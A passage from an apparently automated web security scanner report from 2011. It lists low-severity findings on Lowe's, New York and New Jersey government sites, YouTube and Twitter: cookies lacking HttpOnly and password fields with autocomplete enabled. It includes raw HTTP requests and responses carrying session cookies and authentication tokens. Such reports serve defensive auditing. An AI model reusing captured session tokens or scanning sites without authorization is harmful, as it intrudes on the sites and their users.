Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 28 Apr 2009 19:56:32 GMT
ETag: "1f8e59-22f6-dc02bc00"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 8950
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/* Nifty Corners Cube - rounded corners with CSS and Javascript
Copyright 2006 Alessandro Fulciniti (a.fulciniti@html.it)

This program is free software; you can redistribute it and/or modify
it u
...[SNIP]...

7.55. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /webapp/wcs/stores/servlet/LogonForm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 63497
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Wed, 13-Jul-2011 02:33:05 GMT
Set-Cookie: TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; Path=/
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...

7.56. http://www.nylottery.org/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nylottery.org
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: www.nylottery.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 13 Jul 2011 01:50:12 GMT
Server: IBM_HTTP_Server
Location: http://nylottery.org/wps/portal
Cache-Control: max-age=1
Expires: Wed, 13 Jul 2011 01:50:13 GMT
Content-Length: 215
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_ozmpuufsz.psh*80=ffffffffd236878345525d5f4f58455e445a4a423660;expires=Wed, 13-Jul-2011 01:52:12 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://nylottery.org/wps/portal">here</a>.</p>

...[SNIP]...

7.57. http://www.recovery.ny.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.recovery.ny.gov
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.recovery.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:50:17 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1310521817"
X-Generator: Drupal 7 (http://drupal.org)
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: webpool=webpool_web03; path=/
Content-Length: 15845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...

7.58. http://www.youtube.com/NewJerseyGovernment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /NewJerseyGovernment

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NewJerseyGovernment HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:49:45 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=wAQMWIHYLkY; path=/; domain=.youtube.com; expires=Fri, 09-Mar-2012 01:49:45 GMT
Set-Cookie: GEO=c573c10743b77a4d5e57ac0c7e9af241cwsAAAAzVVOtwdbzThz5uQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sWkFSZzctYUFHdmhDekhtTGY2U282SEp5SmNxQXo0OTB0cEFQaU9sa2IzcGdmbVBIcmM1WWVn -->
<head>



...[SNIP]...

7.59. http://www.youtube.com/newjerseylottery  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /newjerseylottery

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /newjerseylottery HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:49:45 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=TlJvxUF36FY; path=/; domain=.youtube.com; expires=Fri, 09-Mar-2012 01:49:45 GMT
Set-Cookie: GEO=c573c10743b77a4d5e57ac0c7e9af241cwsAAAAzVVOtwdbzThz5uQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sWkFSZzctYUFHdmpXZ2p5bkc3YWk5QVpReFYzTHhKaUtxb29Ha0x4MERGcVhDOWhJUjdVOWVn -->
<head>



...[SNIP]...

8. Password field with autocomplete enabled  previous  next
There are 20 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


8.1. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://portal01.state.nj.us
Path:   /http://portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /http://portal20.sa.state.nj.us:8080/amserver/UI/Login?gw=portal01.state.nj.us&org=snj HTTP/1.1
Host: portal01.state.nj.us
Connection: keep-alive
Referer: http://nj.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:41:04 GMT
Content-type: text/html;charset=UTF-8
Cache-control: private
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-12
Am_client_type: Mozilla
Set-Cookie: %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4SfcwBgv24XJbQ4NKEBvqh8qUMkdDvgelWROk%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Content-Length: 6736
Connection: Keep-Alive
Keep-Alive: timeout=50,max=9


<html>


<head>
<title>Log On To myNewJersey</title>


<link rel="stylesheet" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/oit/styles/mynj3.css" type="text/css">
<
...[SNIP]...
<tr>
   <form name="frm2" action="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/blank"
    onSubmit="defaultSubmit(); return false;" method="post">
   <!-- change D 2008/11/24 -->
...[SNIP]...
<td class="loginText">
    <input type="password" name="IDToken2"
id="IDToken2"
       value="" size="20">

   </td>
...[SNIP]...

8.2. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/signup/NJLoginNewUser  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://portal01.state.nj.us
Path:   /http://portal20.sa.state.nj.us:8080/signup/NJLoginNewUser

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /http://portal20.sa.state.nj.us:8080/signup/NJLoginNewUser HTTP/1.1
Host: portal01.state.nj.us
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=8B7AC0DFAC1D241DA769612C928B4D1F|portal20.sa.state.nj.us|/|iplanet; %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcy8KCHkif57us6GAU2YZ9vUrrHig0JMuag%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; %2Fselfserviceportal20.sa.state.nj.us_JSESSIONID=CA18EEAFF644FACB71077AFF38C6D49C|portal20.sa.state.nj.us|/selfservice|iplanet

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:41:18 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 8957
Connection: Keep-Alive
Keep-Alive: timeout=50,max=9


<html>
<head>
<title>Create Your myNewJersey Account</title>
<link rel="stylesheet" type="text/css" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/portal/desktop/css/styl
...[SNIP]...
</table>


<form name="signup" action="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/signup/NJLoginNewUser" method="POST">
<table border="0" width="100%" cellpadding="3" cellspacing="0">
...[SNIP]...
<td>
<input type="password" width="20" maxlength="20" name="userPassword">

</td>
...[SNIP]...
<td>
<input type="password" width="20" maxlength="20" name="confirmPassword">

</td>
...[SNIP]...

8.3. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://portal01.state.nj.us
Path:   /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login HTTP/1.1
Host: portal01.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:52:28 GMT
Content-type: text/html;charset=UTF-8
Cache-control: private
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-12
Am_client_type: genericHTML
Set-Cookie: %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcy8cIdgoahtAXnAW%252F3%252FPfpm4q%252F9mG8Zu5U%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Content-Length: 6736
Connection: close


<html>


<head>
<title>Log On To myNewJersey</title>


<link rel="stylesheet" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/oit/styles/mynj3.css" type="text/css">
<
...[SNIP]...
<tr>
   <form name="frm2" action="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/blank"
    onSubmit="defaultSubmit(); return false;" method="post">
   <!-- change D 2008/11/24 -->
...[SNIP]...
<td class="loginText">
    <input type="password" name="IDToken2"
id="IDToken2"
       value="" size="20">

   </td>
...[SNIP]...

8.4. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/signup/NJLoginNewUser  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://portal01.state.nj.us
Path:   /http:/portal20.sa.state.nj.us:8080/signup/NJLoginNewUser

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /http:/portal20.sa.state.nj.us:8080/signup/NJLoginNewUser HTTP/1.1
Host: portal01.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:53:02 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 8957
Connection: close


<html>
<head>
<title>Create Your myNewJersey Account</title>
<link rel="stylesheet" type="text/css" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/portal/desktop/css/styl
...[SNIP]...
</table>


<form name="signup" action="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/signup/NJLoginNewUser" method="POST">
<table border="0" width="100%" cellpadding="3" cellspacing="0">
...[SNIP]...
<td>
<input type="password" width="20" maxlength="20" name="userPassword">

</td>
...[SNIP]...
<td>
<input type="password" width="20" maxlength="20" name="confirmPassword">

</td>
...[SNIP]...

8.5. http://twitter.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310521875-90449-3159
ETag: "85527ad242b776a506d5d88b053c21da"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 01:51:15 GMT
X-Runtime: 0.01211
Content-Type: text/html; charset=utf-8
Content-Length: 50437
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 47f8e2ed085eaed7e4648c027947ab8baa7aa28c
Set-Cookie: k=173.193.214.243.1310521875602718; path=/; expires=Wed, 20-Jul-11 01:51:15 GMT; domain=.twitter.com
Set-Cookie: guest_id=v1%3A131052187562584923; domain=.twitter.com; path=/; expires=Fri, 12 Jul 2013 13:51:15 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCKvcMCExAToHaWQiJTBhODMxZjBmYjMyMjIx%250AMzFlNTk1NDRhNDIzZmVhYTgwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--53400218b1904fe1c703d7d2b21d9ca4aa243e52; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />


<script type="text/javascript" charset="utf-8">


...[SNIP]...
</h3>
<form action="https://twitter.com/signup" class="signup signup-btn" method="post">
<div class="holding name">
...[SNIP]...
<div class="holding password">
<input type="password" value="" name="user[user_password]"/>
<span class="holder">
...[SNIP]...

8.6. http://twitter.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310521875-90449-3159
ETag: "85527ad242b776a506d5d88b053c21da"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 01:51:15 GMT
X-Runtime: 0.01211
Content-Type: text/html; charset=utf-8
Content-Length: 50437
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 47f8e2ed085eaed7e4648c027947ab8baa7aa28c
Set-Cookie: k=173.193.214.243.1310521875602718; path=/; expires=Wed, 20-Jul-11 01:51:15 GMT; domain=.twitter.com
Set-Cookie: guest_id=v1%3A131052187562584923; domain=.twitter.com; path=/; expires=Fri, 12 Jul 2013 13:51:15 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCKvcMCExAToHaWQiJTBhODMxZjBmYjMyMjIx%250AMzFlNTk1NDRhNDIzZmVhYTgwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--53400218b1904fe1c703d7d2b21d9ca4aa243e52; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />


<script type="text/javascript" charset="utf-8">


...[SNIP]...
<div class="front-signin">
<form action="https://twitter.com/sessions?phx=1" class="signin" method="post">
<fieldset class="textbox">
...[SNIP]...
<div class="holding password">
<input type="password" value="" name="session[password]" title="Password" />
<span class="holder">
...[SNIP]...

8.7. http://twitter.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310521875-90449-3159
ETag: "85527ad242b776a506d5d88b053c21da"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 01:51:15 GMT
X-Runtime: 0.01211
Content-Type: text/html; charset=utf-8
Content-Length: 50437
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 47f8e2ed085eaed7e4648c027947ab8baa7aa28c
Set-Cookie: k=173.193.214.243.1310521875602718; path=/; expires=Wed, 20-Jul-11 01:51:15 GMT; domain=.twitter.com
Set-Cookie: guest_id=v1%3A131052187562584923; domain=.twitter.com; path=/; expires=Fri, 12 Jul 2013 13:51:15 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCKvcMCExAToHaWQiJTBhODMxZjBmYjMyMjIx%250AMzFlNTk1NDRhNDIzZmVhYTgwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--53400218b1904fe1c703d7d2b21d9ca4aa243e52; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />


<script type="text/javascript" charset="utf-8">


...[SNIP]...
<div id="signin-dropdown" class="dropdown dark">
<form action="https://twitter.com/sessions?phx=1" class="signin" method="post">
<fieldset class="textbox">
...[SNIP]...
</span>
<input type="password" value="" name="session[password]" />
</label>
...[SNIP]...

8.8. http://twitter.com/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login HTTP/1.1
Host: twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Cookie: k=173.193.214.243.1310522711741462; guest_id=v1%3A131052271223855296; _twitter_sess=BAh7CjoVaW5fbmV3X3VzZXJfZmxvdzA6D2NyZWF0ZWRfYXRsKwixoD0hMQE6%250AB2lkIiU5OWExZDRmMWUzN2U3MzU3MTZiMTI2Zjc0NDNmODVhNzoMY3NyZl9p%250AZCIlY2FhNmZmMWMzY2YwMWUxNTYyYWQ4NzgyMGRmMGJlMTgiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA%253D--50bfdb52e14835d473c0b9478dd99f22193f449a; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utma=43838368.1509851687.1310522719.1310522719.1310522719.1; __utmb=43838368.4.10.1310522719; __utmc=43838368; __utmz=43838368.1310522719.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:06:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310522800-71865-3084
ETag: "605d04975bd04dbcd5af5dbcf382d8c9"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 02:06:40 GMT
X-Runtime: 0.03641
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: ee9849c5dfc40ffaec37fd046b2f29f18a437fd8
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 14650
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="acce37ba65594e6f8b106166a27f65126fee5a00" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

8.9. http://twitter.com/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login HTTP/1.1
Host: twitter.com
